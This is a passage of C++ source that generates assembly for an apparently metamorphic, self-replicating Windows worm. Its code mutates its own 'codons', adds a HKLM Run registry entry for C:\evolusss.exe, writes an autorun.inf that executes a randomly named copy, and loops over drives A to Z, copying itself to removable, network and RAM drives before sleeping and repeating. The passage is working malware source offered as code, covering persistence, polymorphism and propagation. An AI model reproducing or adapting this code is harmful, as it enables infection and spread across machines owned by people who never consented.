2448file << " RPBlock1End1: ; Not equal amino acids" << endl; CreateAnIntron();
2449file << " _pop ; remove " << static_cast<char>(34) << "call" << static_cast<char>(34) << "-return address" << endl; CreateAnIntron();
2450file << " _pop ; RPBlock1End-Jmp Address" << endl; CreateAnIntron();
2451
2452zer0(0);
2453addnumber("15");
2454file << " _save" << endl; CreateAnIntron();
2455
2456GetAddress("RandomNumber");
2457file << " _getdata ; BC1=random" << endl; CreateAnIntron();
2458
2459file << " _shr ; BC1=random >> 15 (to get new small random number without calling the 32bit RND engine again)" << endl; CreateAnIntron();
2460file << " _and ; BC1=(random >> 15) % 0000 1111b" << endl; CreateAnIntron();
2461file << " _JnzUp ; If not zero -> Next loop!" << endl; CreateAnIntron();
2462
2463
2464file << " ; Not found any equivalences..." << endl; CreateAnIntron();
2465
2466zer0(0);
2467addnumber("((RPBlock3End1-RPBlock3Start1)*8)");
2468file << " _save" << endl; CreateAnIntron();
2469
2470file << " _getEIP" << endl; CreateAnIntron();
2471
2472file << " RPBlock3Start1:" << endl; CreateAnIntron();
2473addnumber("3");
2474file << " _addsaved" << endl; CreateAnIntron();
2475
2476file << " _call ; jmp to end of poly-engine: RPBlock3End" << endl; CreateAnIntron();
2477
2478
2479
2480
2481file << " RPBlock2End1: ; Equal amino acids found" << endl; CreateAnIntron();
2482file << " _pop ; remove " << static_cast<char>(34) << "call" << static_cast<char>(34) << "-return address" << endl; CreateAnIntron();
2483file << " _pop ; RPBlock2End-Jmp Address" << endl; CreateAnIntron();
2484
2485
2486GetAddress("MapPointer");
2487file << " _getdata" << endl; CreateAnIntron();
2488
2489addnumber("(CodeStart+(StAmino-start))");
2490file << " _nopdD" << endl; CreateAnIntron();
2491
2492GetAddress("RPAminoAcid1");
2493file << " _getdata" << endl; CreateAnIntron();
2494file << " _nopdA" << endl; CreateAnIntron();
2495
2496GetAddress("RPAminoAcid2");
2497file << " _getdata" << endl; CreateAnIntron();
2498file << " _nopdB" << endl; CreateAnIntron();
2499
2500zer0(0);
2501GetAddress("FileSize");
2502file << " _getdata" << endl; CreateAnIntron();
2503addnumber("(0xFFFFFFFF-(CodeStart+(StAmino-start))-1000)");
2504file << " _push" << endl; CreateAnIntron();
2505
2506file << " _getEIP" << endl; CreateAnIntron();
2507file << " _sub0001" << endl; CreateAnIntron();
2508file << " _sub0001" << endl; CreateAnIntron();
2509file << " _sub0001" << endl; CreateAnIntron();
2510file << " _sub0001" << endl; CreateAnIntron();
2511file << " _sub0001" << endl; CreateAnIntron();
2512file << " _saveJmpOff" << endl; CreateAnIntron();
2513
2514file << " _nopsD ; Codon-Sequence Start" << endl; CreateAnIntron();
2515file << " _save" << endl; CreateAnIntron();
2516
2517file << " _pop" << endl; CreateAnIntron();
2518file << " _push ; counter" << endl; CreateAnIntron();
2519
2520file << " _addsaved" << endl; CreateAnIntron();
2521file << " _saveWrtOff" << endl; CreateAnIntron();
2522file << " _getdata" << endl; CreateAnIntron();
2523file << " _push" << endl; CreateAnIntron();
2524
2525zer0(0);
2526addnumber("255");
2527file << " _save" << endl; CreateAnIntron();
2528file << " _pop" << endl; CreateAnIntron();
2529file << " _and ; BC1=one byte" << endl; CreateAnIntron();
2530file << " _save" << endl; CreateAnIntron();
2531
2532file << " _nopsA" << endl; CreateAnIntron();
2533
2534subsaved(0);
2535file << " _JnzDown" << endl;
2536file << " _nopsB" << endl;
2537file << " _writeByte ; If equal: exchange codon!" << endl;
2538file << " _nopREAL" << endl;
2539file << " _nopREAL" << endl;
2540
2541file << " _pushall" << endl; CreateAnIntron();
2542CalcNewRandNumberAndSaveIt();
2543file << " _popall" << endl; CreateAnIntron();
2544
2545zer0(0);
2546addnumber("1");
2547file << " _save" << endl; CreateAnIntron();
2548
2549GetAddress("RandomNumber");
2550file << " _getdata" << endl; CreateAnIntron();
2551file << " _and" << endl; CreateAnIntron();
2552addnumber("1");
2553file << " _save ; BC2=(rand%8)+1" << endl; CreateAnIntron();
2554
2555file << " _pop" << endl; CreateAnIntron();
2556subsaved(0);
2557file << " _push" << endl; CreateAnIntron();
2558
2559zer0(0);
2560addnumber("4293918720");
2561file << " _save" << endl; CreateAnIntron();
2562file << " _pop" << endl; CreateAnIntron();
2563file << " _push" << endl; CreateAnIntron();
2564file << " _and ; BC1=(counter%0xFFF0 0000)" << endl; CreateAnIntron();
2565
2566file << " _JnzDown" << endl;
2567file << " _add0001 ; Not finished" << endl;
2568file << " _JnzUp ; Next step" << endl;
2569file << " _nopREAL" << endl;
2570file << " _nopREAL" << endl;
2571
2572
2573file << " _pop ; counter away from stack" << endl; CreateAnIntron();
2574file << " _push ; trash" << endl; CreateAnIntron();
2575
2576file << " RPBlock3End1:" << endl; CreateAnIntron();
2577file << " _pop ; return value from call" << endl; CreateAnIntron();
2578
2579
2580GetAddress("MapPointer");
2581file << " _getdata" << endl; CreateAnIntron();
2582file << " _push" << endl; CreateAnIntron();
2583CallAPI("hUnmapViewOfFile");
2584
2585GetAddress("MapHandle");
2586file << " _getdata" << endl; CreateAnIntron();
2587file << " _push" << endl; CreateAnIntron();
2588CallAPI("hCloseHandle");
2589
2590GetAddress("FileHandle");
2591file << " _getdata" << endl; CreateAnIntron();
2592file << " _push" << endl; CreateAnIntron();
2593CallAPI("hCloseHandle");
2594
2595
2596GetAddress("AutoStartContentStart");
2597file << " _saveWrtOff" << endl; CreateAnIntron();
2598file << " _nopdA" << endl; CreateAnIntron();
2599
2600GetAddress("stSubKey");
2601file << " _nopdA" << endl; CreateAnIntron();
2602file << " _saveWrtOff" << endl; CreateAnIntron();
2603zer0(0);
2604addnumber("\'SOFT\'");
2605file << " _writeDWord" << endl; CreateAnIntron();
2606
2607file << " _nopsA" << endl; CreateAnIntron();
2608addnumber("4");
2609file << " _nopdA" << endl; CreateAnIntron();
2610file << " _saveWrtOff" << endl; CreateAnIntron();
2611zer0(0);
2612addnumber("\'WARE\'");
2613file << " _writeDWord" << endl; CreateAnIntron();
2614
2615file << " _nopsA" << endl; CreateAnIntron();
2616addnumber("4");
2617file << " _nopdA" << endl; CreateAnIntron();
2618file << " _saveWrtOff" << endl; CreateAnIntron();
2619zer0(0);
2620addnumber("\'\\Mic\'");
2621file << " _writeDWord" << endl; CreateAnIntron();
2622
2623file << " _nopsA" << endl; CreateAnIntron();
2624addnumber("4");
2625file << " _nopdA" << endl; CreateAnIntron();
2626file << " _saveWrtOff" << endl; CreateAnIntron();
2627zer0(0);
2628addnumber("\'roso\'");
2629file << " _writeDWord" << endl; CreateAnIntron();
2630
2631file << " _nopsA" << endl; CreateAnIntron();
2632addnumber("4");
2633file << " _nopdA" << endl; CreateAnIntron();
2634file << " _saveWrtOff" << endl; CreateAnIntron();
2635zer0(0);
2636addnumber("\'ft\\W\'");
2637file << " _writeDWord" << endl; CreateAnIntron();
2638
2639file << " _nopsA" << endl; CreateAnIntron();
2640addnumber("4");
2641file << " _nopdA" << endl; CreateAnIntron();
2642file << " _saveWrtOff" << endl; CreateAnIntron();
2643zer0(0);
2644addnumber("\'indo\'");
2645file << " _writeDWord" << endl; CreateAnIntron();
2646
2647file << " _nopsA" << endl; CreateAnIntron();
2648addnumber("4");
2649file << " _nopdA" << endl; CreateAnIntron();
2650file << " _saveWrtOff" << endl; CreateAnIntron();
2651zer0(0);
2652addnumber("\'ws\\C\'");
2653file << " _writeDWord" << endl; CreateAnIntron();
2654
2655file << " _nopsA" << endl; CreateAnIntron();
2656addnumber("4");
2657file << " _nopdA" << endl; CreateAnIntron();
2658file << " _saveWrtOff" << endl; CreateAnIntron();
2659zer0(0);
2660addnumber("\'urre\'");
2661file << " _writeDWord" << endl; CreateAnIntron();
2662
2663file << " _nopsA" << endl; CreateAnIntron();
2664addnumber("4");
2665file << " _nopdA" << endl; CreateAnIntron();
2666file << " _saveWrtOff" << endl; CreateAnIntron();
2667zer0(0);
2668addnumber("\'ntVe\'");
2669file << " _writeDWord" << endl; CreateAnIntron();
2670
2671file << " _nopsA" << endl; CreateAnIntron();
2672addnumber("4");
2673file << " _nopdA" << endl; CreateAnIntron();
2674file << " _saveWrtOff" << endl; CreateAnIntron();
2675zer0(0);
2676addnumber("\'rsio\'");
2677file << " _writeDWord" << endl; CreateAnIntron();
2678
2679file << " _nopsA" << endl; CreateAnIntron();
2680addnumber("4");
2681file << " _nopdA" << endl; CreateAnIntron();
2682file << " _saveWrtOff" << endl; CreateAnIntron();
2683zer0(0);
2684addnumber("\'n\\Ru\'");
2685file << " _writeDWord" << endl; CreateAnIntron();
2686
2687file << " _nopsA" << endl; CreateAnIntron();
2688addnumber("4");
2689file << " _saveWrtOff" << endl; CreateAnIntron();
2690zer0(0);
2691addnumber("\'n\'");
2692file << " _writeDWord" << endl; CreateAnIntron();
2693
2694
2695GetAddress("hRegKey");
2696file << " _push" << endl; CreateAnIntron();
2697GetAddress("stSubKey");
2698file << " _push" << endl; CreateAnIntron();
2699zer0(0);
2700addnumber("HKEY_LOCAL_MACHINE");
2701file << " _push" << endl; CreateAnIntron();
2702CallAPI("hRegCreateKeyA");
2703
2704zer0(0);
2705addnumber("15");
2706file << " _push ; 15" << endl; CreateAnIntron();
2707GetAddress("Driveletter3");
2708file << " _push ; C:" << static_cast<char>(92) << "evolusss.exe" << endl; CreateAnIntron();
2709zer0(0);
2710addnumber("REG_SZ");
2711file << " _push ; REG_SZ" << endl; CreateAnIntron();
2712zer0(0);
2713file << " _push ; 0x0" << endl; CreateAnIntron();
2714file << " _push ; 0x0" << endl; CreateAnIntron();
2715GetAddress("hRegKey");
2716file << " _getdata" << endl; CreateAnIntron();
2717file << " _push ; dword[hRegKey]" << endl; CreateAnIntron();
2718CallAPI("hRegSetValueExA");
2719
2720GetAddress("AutoStartContentStart");
2721file << " _nopdA" << endl; CreateAnIntron();
2722file << " _saveWrtOff" << endl; CreateAnIntron();
2723zer0(0);
2724addnumber("\'[Aut\'");
2725file << " _writeDWord" << endl; CreateAnIntron();
2726
2727file << " _nopsA" << endl; CreateAnIntron();
2728addnumber("4");
2729file << " _nopdA" << endl; CreateAnIntron();
2730file << " _saveWrtOff" << endl; CreateAnIntron();
2731zer0(0);
2732addnumber("\'orun\'");
2733file << " _writeDWord" << endl; CreateAnIntron();
2734
2735file << " _nopsA" << endl; CreateAnIntron();
2736addnumber("4");
2737file << " _nopdA" << endl; CreateAnIntron();
2738file << " _saveWrtOff" << endl; CreateAnIntron();
2739zer0(0);
2740addnumber("0x530A0D5D");
2741file << " _writeDWord" << endl; CreateAnIntron();
2742
2743file << " _nopsA" << endl; CreateAnIntron();
2744addnumber("4");
2745file << " _nopdA" << endl; CreateAnIntron();
2746file << " _saveWrtOff" << endl; CreateAnIntron();
2747zer0(0);
2748addnumber("\'hell\'");
2749file << " _writeDWord" << endl; CreateAnIntron();
2750
2751file << " _nopsA" << endl; CreateAnIntron();
2752addnumber("4");
2753file << " _nopdA" << endl; CreateAnIntron();
2754file << " _saveWrtOff" << endl; CreateAnIntron();
2755zer0(0);
2756addnumber("\'Exec\'");
2757file << " _writeDWord" << endl; CreateAnIntron();
2758
2759file << " _nopsA" << endl; CreateAnIntron();
2760addnumber("4");
2761file << " _nopdA" << endl; CreateAnIntron();
2762file << " _saveWrtOff" << endl; CreateAnIntron();
2763zer0(0);
2764addnumber("\'ute=\'");
2765file << " _writeDWord" << endl; CreateAnIntron();
2766
2767file << " _nopsA" << endl; CreateAnIntron();
2768addnumber("4");
2769file << " _nopdA" << endl; CreateAnIntron();
2770file << " _saveWrtOff" << endl; CreateAnIntron();
2771GetAddress("RandomFileName");
2772file << " _nopdB" << endl; CreateAnIntron();
2773file << " _getdata" << endl; CreateAnIntron();
2774file << " _writeDWord" << endl; CreateAnIntron();
2775
2776file << " _nopsA" << endl; CreateAnIntron();
2777addnumber("4");
2778file << " _nopdA" << endl; CreateAnIntron();
2779file << " _saveWrtOff" << endl; CreateAnIntron();
2780file << " _nopsB" << endl; CreateAnIntron();
2781addnumber("4");
2782file << " _getdata" << endl; CreateAnIntron();
2783file << " _writeDWord" << endl; CreateAnIntron();
2784
2785file << " _nopsA" << endl; CreateAnIntron();
2786addnumber("4");
2787file << " _nopdA" << endl; CreateAnIntron();
2788file << " _saveWrtOff" << endl; CreateAnIntron();
2789zer0(0);
2790addnumber("\'.exe\'");
2791file << " _writeDWord" << endl; CreateAnIntron();
2792
2793file << " _nopsA" << endl; CreateAnIntron();
2794addnumber("4");
2795file << " _nopdA" << endl; CreateAnIntron();
2796file << " _saveWrtOff" << endl; CreateAnIntron();
2797zer0(0);
2798addnumber("0x73550A0D");
2799file << " _writeDWord" << endl; CreateAnIntron();
2800
2801file << " _nopsA" << endl; CreateAnIntron();
2802addnumber("4");
2803file << " _nopdA" << endl; CreateAnIntron();
2804file << " _saveWrtOff" << endl; CreateAnIntron();
2805zer0(0);
2806addnumber("\'eAut\'");
2807file << " _writeDWord" << endl; CreateAnIntron();
2808
2809file << " _nopsA" << endl; CreateAnIntron();
2810addnumber("4");
2811file << " _nopdA" << endl; CreateAnIntron();
2812file << " _saveWrtOff" << endl; CreateAnIntron();
2813zer0(0);
2814addnumber("\'opla\'");
2815file << " _writeDWord" << endl; CreateAnIntron();
2816
2817file << " _nopsA" << endl; CreateAnIntron();
2818addnumber("3");
2819file << " _nopdA" << endl; CreateAnIntron();
2820file << " _saveWrtOff" << endl; CreateAnIntron();
2821zer0(0);
2822addnumber("\'ay=1\'");
2823file << " _writeDWord" << endl; CreateAnIntron();
2824
2825GetAddress("autoruninf");
2826file << " _nopdA" << endl; CreateAnIntron();
2827file << " _saveWrtOff" << endl; CreateAnIntron();
2828zer0(0);
2829addnumber("\'auto\'");
2830file << " _writeDWord" << endl; CreateAnIntron();
2831
2832file << " _nopsA" << endl; CreateAnIntron();
2833addnumber("4");
2834file << " _nopdA" << endl; CreateAnIntron();
2835file << " _saveWrtOff" << endl; CreateAnIntron();
2836zer0(0);
2837addnumber("\'run.\'");
2838file << " _writeDWord" << endl; CreateAnIntron();
2839
2840file << " _nopsA" << endl; CreateAnIntron();
2841addnumber("3");
2842file << " _saveWrtOff" << endl; CreateAnIntron();
2843zer0(0);
2844addnumber("\'.inf\'");
2845file << " _writeDWord" << endl; CreateAnIntron();
2846
2847zer0(0);
2848file << " _push ; 0x0" << endl; CreateAnIntron();
2849addnumber("2");
2850file << " _push ; 0x2" << endl; CreateAnIntron();
2851zer0(0);
2852addnumber("CREATE_ALWAYS");
2853file << " _push ; CREATE_ALWAYS" << endl; CreateAnIntron();
2854zer0(0);
2855file << " _push ; 0x0" << endl; CreateAnIntron();
2856file << " _push ; 0x0" << endl; CreateAnIntron();
2857addnumber("0xC0000000");
2858file << " _push ; 0xC0000000" << endl; CreateAnIntron();
2859GetAddress("autoruninf");
2860file << " _push ; autoruninf" << endl; CreateAnIntron();
2861CallAPI("hCreateFileA");
2862
2863GetAddress("FileHandle");
2864file << " _saveWrtOff" << endl; CreateAnIntron();
2865file << " _nopsA" << endl; CreateAnIntron();
2866file << " _writeDWord ; dword[FileHandle]=eax" << endl; CreateAnIntron();
2867
2868zer0(0);
2869file << " _push ; 0x0" << endl; CreateAnIntron();
2870GetAddress("MapHandle");
2871file << " _push ; Trash-Address" << endl; CreateAnIntron();
2872zer0(0);
2873addnumber("(AutoStartContentEnd-AutoStartContentStart)");
2874file << " _push ; Size of Buffer" << endl; CreateAnIntron();
2875GetAddress("AutoStartContentStart");
2876file << " _push ; Buffer to write" << endl; CreateAnIntron();
2877GetAddress("FileHandle");
2878file << " _getdata" << endl; CreateAnIntron();
2879file << " _push ; FileHandle" << endl; CreateAnIntron();
2880CallAPI("hWriteFile");
2881
2882GetAddress("FileHandle");
2883file << " _getdata" << endl; CreateAnIntron();
2884file << " _push" << endl; CreateAnIntron();
2885CallAPI("hCloseHandle");
2886
2887file << " _getEIP" << endl; CreateAnIntron();
2888file << " _sub0001" << endl; CreateAnIntron();
2889file << " _sub0001" << endl; CreateAnIntron();
2890file << " _sub0001" << endl; CreateAnIntron();
2891file << " _sub0001" << endl; CreateAnIntron();
2892file << " _sub0001" << endl; CreateAnIntron();
2893file << " _saveJmpOff ; Loop over Drive Letter A-Z" << endl; CreateAnIntron();
2894
2895file << " _pushall" << endl; CreateAnIntron();
2896zer0(0);
2897file << " _nopdB ; RegB=0" << endl; CreateAnIntron();
2898file << " " << endl; CreateAnIntron();
2899GetAddress("Driveletter1-1");
2900file << " _saveWrtOff" << endl; CreateAnIntron();
2901zer0(0);
2902addnumber("0x003A4100");
2903file << " _writeDWord" << endl; CreateAnIntron();
2904file << " " << endl; CreateAnIntron();
2905GetAddress("Driveletter2-1");
2906file << " _saveWrtOff" << endl; CreateAnIntron();
2907zer0(0);
2908addnumber("0x5C3A4100");
2909file << " _writeDWord" << endl; CreateAnIntron();
2910file << " " << endl; CreateAnIntron();
2911file << " " << endl; CreateAnIntron();
2912zer0(0);
2913addnumber("26");
2914file << " _nopdA ; counter" << endl; CreateAnIntron();
2915file << " " << endl; CreateAnIntron();
2916file << " _getEIP" << endl; CreateAnIntron();
2917file << " _sub0001" << endl; CreateAnIntron();
2918file << " _sub0001" << endl; CreateAnIntron();
2919file << " _sub0001" << endl; CreateAnIntron();
2920file << " _sub0001" << endl; CreateAnIntron();
2921file << " _sub0001" << endl; CreateAnIntron();
2922file << " _saveJmpOff ; Loop over Drive Letter A-Z" << endl; CreateAnIntron();
2923
2924file << " _pushall" << endl; CreateAnIntron();
2925file << " " << endl; CreateAnIntron();
2926GetAddress("Driveletter1+2");
2927file << " _saveWrtOff" << endl; CreateAnIntron();
2928zer0(1);
2929file << " _writeByte" << endl; CreateAnIntron();
2930
2931GetAddress("Driveletter1");
2932file << " _push" << endl; CreateAnIntron();
2933CallAPI("hGetDriveTypeA");
2934
2935file << " _nopsA" << endl; CreateAnIntron();
2936file << " _save ; save Drive type" << endl; CreateAnIntron();
2937
2938zer0(1);
2939addnumber("0x0010");
2940file << " _push" << endl; CreateAnIntron();
2941
2942zer0(1);
2943addnumber("2");
2944subsaved(1);
2945file << " _JnzDown ; Is DRIVE_REMOVABLE?" << endl;
2946file << " _pop ; Stack=0x0010" << endl;
2947file << " _push" << endl;
2948file << " _nopdB ; RegB=0x0010 -> FILE+AUTOSTART" << endl;
2949file << " _nopREAL" << endl;
2950
2951file << " _pop ; Trash away" << endl; CreateAnIntron();
2952
2953zer0(1);
2954addnumber("0x0040");
2955file << " _push" << endl; CreateAnIntron();
2956
2957zer0(1);
2958addnumber("3");
2959subsaved(1);
2960file << " _JnzDown ; Is DRIVE_FIXED?" << endl;
2961file << " _pop" << endl;
2962file << " _push ; RegB=0x0040 -> FILE" << endl;
2963file << " _nopdB" << endl;
2964file << " _nopREAL" << endl;
2965
2966file << " _pop ; Trash away" << endl; CreateAnIntron();
2967
2968zer0(1);
2969addnumber("0x0010");
2970file << " _push" << endl; CreateAnIntron();
2971
2972zer0(1);
2973addnumber("4");
2974subsaved(1);
2975file << " _JnzDown ; Is DRIVE_REMOTE?" << endl;
2976file << " _pop" << endl;
2977file << " _push ; RegB=0x0010 -> FILE+AUTOSTART" << endl;
2978file << " _nopdB" << endl;
2979file << " _nopREAL" << endl;
2980
2981
2982zer0(1);
2983addnumber("6");
2984subsaved(1);
2985file << " _JnzDown ; Is DRIVE_RAMDISK?" << endl;
2986file << " _pop" << endl;
2987file << " _push ; RegB=0x0010 -> FILE+AUTOSTART" << endl;
2988file << " _nopdB" << endl;
2989file << " _nopREAL" << endl;
2990
2991file << " _pop ; Trash away" << endl; CreateAnIntron();
2992
2993file << " ; ############################################################################" << endl; CreateAnIntron();
2994file << " ; ##### Copy autorun.inf (or not)" << endl; CreateAnIntron();
2995file << " " << endl; CreateAnIntron();
2996GetAddress("autoruninf");
2997file << " _nopdA ; address to " << static_cast<char>(34) << "autorun.inf" << static_cast<char>(34) << " to RegA" << endl; CreateAnIntron();
2998GetAddress("Driveletter2");
2999file << " _nopdD ; address to " << static_cast<char>(34) << "?:" << static_cast<char>(92) << "autorun.inf" << static_cast<char>(34) << " to RegD" << endl; CreateAnIntron();
3000file << " " << endl; CreateAnIntron();
3001file << " _nopsB" << endl; CreateAnIntron();
3002file << " _save" << endl; CreateAnIntron();
3003file << " " << endl; CreateAnIntron();
3004file << " " << endl; CreateAnIntron();
3005zer0(1);
3006addnumber("0x0010");
3007subsaved(1);
3008file << " _JnzDown" << endl;
3009file << " _nopREAL ; BC1=0x0" << endl;
3010file << " _push ; bFailIfExists=FALSE" << endl;
3011file << " _nopsD" << endl;
3012file << " _push ; lpNewFileName=" << static_cast<char>(34) << "?:" << static_cast<char>(92) << "autorun.inf" << static_cast<char>(34) << "" << endl;
3013file << " " << endl; CreateAnIntron();
3014file << " " << endl; CreateAnIntron();
3015GetAddress("hCopyFileA");
3016file << " _getdata" << endl; CreateAnIntron();
3017file << " _nopdD" << endl; CreateAnIntron();
3018file << " " << endl; CreateAnIntron();
3019zer0(1);
3020addnumber("0x0010");
3021subsaved(1);
3022file << " _JnzDown" << endl;
3023file << " _nopsA" << endl;
3024file << " _push ; lpExistingFileName=" << static_cast<char>(34) << "autorun.inf" << static_cast<char>(34) << "" << endl;
3025file << " _nopsD" << endl;
3026file << " _call ; stdcall dword[hCopyFileA]" << endl;
3027file << " " << endl; CreateAnIntron();
3028
3029file << " _nopsB" << endl; CreateAnIntron();
3030file << " _save ; restore BC2 (=RegB)" << endl; CreateAnIntron();
3031
3032zer0(1);
3033addnumber("0x0040");
3034file << " _push" << endl; CreateAnIntron();
3035
3036zer0(1);
3037addnumber("0x0010");
3038subsaved(1);
3039file << " _JnzDown" << endl;
3040file << " _pop" << endl;
3041file << " _push" << endl;
3042file << " _nopdB" << endl;
3043file << " _save ; also copy child executable" << endl;
3044
3045file << " _pop ; Trash away" << endl; CreateAnIntron();
3046
3047file << " " << endl; CreateAnIntron();
3048file << " ; ##### End Copy autorun.inf (or not)" << endl; CreateAnIntron();
3049file << " ; ############################################################################" << endl; CreateAnIntron();
3050
3051
3052file << " ; ############################################################################" << endl; CreateAnIntron();
3053file << " ; ##### Copy child executable (or not)" << endl; CreateAnIntron();
3054file << " " << endl; CreateAnIntron();
3055GetAddress("Driveletter1+2");
3056file << " _saveWrtOff" << endl; CreateAnIntron();
3057zer0(1);
3058addnumber("0x5C");
3059file << " _writeByte" << endl; CreateAnIntron();
3060file << " " << endl; CreateAnIntron();
3061GetAddress("RandomFileName");
3062file << " _nopdA ; address to " << static_cast<char>(34) << "NNNNNNNN.exe" << static_cast<char>(34) << " to RegA" << endl; CreateAnIntron();
3063GetAddress("Driveletter1");
3064file << " _nopdD ; address to " << static_cast<char>(34) << "?:" << static_cast<char>(92) << "NNNNNNNN.exe" << static_cast<char>(34) << " to RegD" << endl; CreateAnIntron();
3065file << " " << endl; CreateAnIntron();
3066file << " _nopsB" << endl; CreateAnIntron();
3067file << " _save" << endl; CreateAnIntron();
3068file << " " << endl; CreateAnIntron();
3069zer0(1);
3070addnumber("0x0040");
3071subsaved(1);
3072file << " _JnzDown" << endl;
3073file << " _nopREAL" << endl;
3074file << " _push ; bFailIfExists=FALSE" << endl;
3075file << " _nopsD" << endl;
3076file << " _push ; lpNewFileName=" << static_cast<char>(34) << "?:" << static_cast<char>(92) << "NNNNNNNN.exe" << static_cast<char>(34) << "" << endl;
3077file << " " << endl; CreateAnIntron();
3078file << " " << endl; CreateAnIntron();
3079GetAddress("hCopyFileA");
3080file << " _getdata" << endl; CreateAnIntron();
3081file << " _nopdD" << endl; CreateAnIntron();
3082file << " " << endl; CreateAnIntron();
3083zer0(1);
3084addnumber("0x0040");
3085subsaved(1);
3086file << " _JnzDown" << endl;
3087file << " _nopsA" << endl;
3088file << " _push ; lpExistingFileName=" << static_cast<char>(34) << "NNNNNNNN.exe" << static_cast<char>(34) << "" << endl;
3089file << " _nopsD" << endl;
3090file << " _call ; stdcall dword[hCopyFileA]" << endl;
3091
3092file << " ; ##### End Copy child executable (or not)" << endl; CreateAnIntron();
3093file << " ; ############################################################################" << endl; CreateAnIntron();
3094
3095file << " _popall" << endl; CreateAnIntron();
3096file << " " << endl; CreateAnIntron();
3097GetAddress("Driveletter1");
3098file << " _saveWrtOff" << endl; CreateAnIntron();
3099file << " _getdata" << endl; CreateAnIntron();
3100addnumber("1");
3101file << " _writeByte" << endl; CreateAnIntron();
3102file << " " << endl; CreateAnIntron();
3103GetAddress("Driveletter2");
3104file << " _saveWrtOff" << endl; CreateAnIntron();
3105file << " _getdata" << endl; CreateAnIntron();
3106addnumber("1");
3107file << " _writeByte" << endl; CreateAnIntron();
3108file << " " << endl; CreateAnIntron();
3109file << " " << endl; CreateAnIntron();
3110file << " _nopsA" << endl; CreateAnIntron();
3111file << " _sub0001" << endl; CreateAnIntron();
3112file << " _nopdA" << endl; CreateAnIntron();
3113file << " " << endl; CreateAnIntron();
3114file << " _JnzUp" << endl; CreateAnIntron();
3115
3116file << " _popall" << endl; CreateAnIntron();
3117zer0(0);
3118addnumber("0x6666");
3119file << " _push" << endl; CreateAnIntron();
3120CallAPI("hSleep");
3121
3122
3123zer0(0);
3124addnumber("1");
3125file << " _JnzUp" << endl; CreateAnIntron();
3126
3127file << "" << endl;
3128file << "EndAminoAcids1:" << endl;
3129file << "" << endl;
3130file << "; ##################################################################" << endl;
3131file << "" << endl;
3132for (int i=0; i<500; i++) { CreateAnIntron(); }
3133file << "EndAmino:" << endl;
3134for (int i=0; i<500; i++) { CreateAnIntron(); }
3135file << ".end start";
3136
3137
3138 file.close();
3139 cout << "Created:" << endl;
3140 cout << "Translator Introns: " << cIntronN << endl;
3141 cout << "Codon Start/Stop Introns: " << IntronSTST << endl;
3142 cout << "Codon NOP Introns: " << IntronNOP << endl << endl;
3143 cout << "Finish :)" << endl;
3144 //cin.get();
3145 return(666);
3146}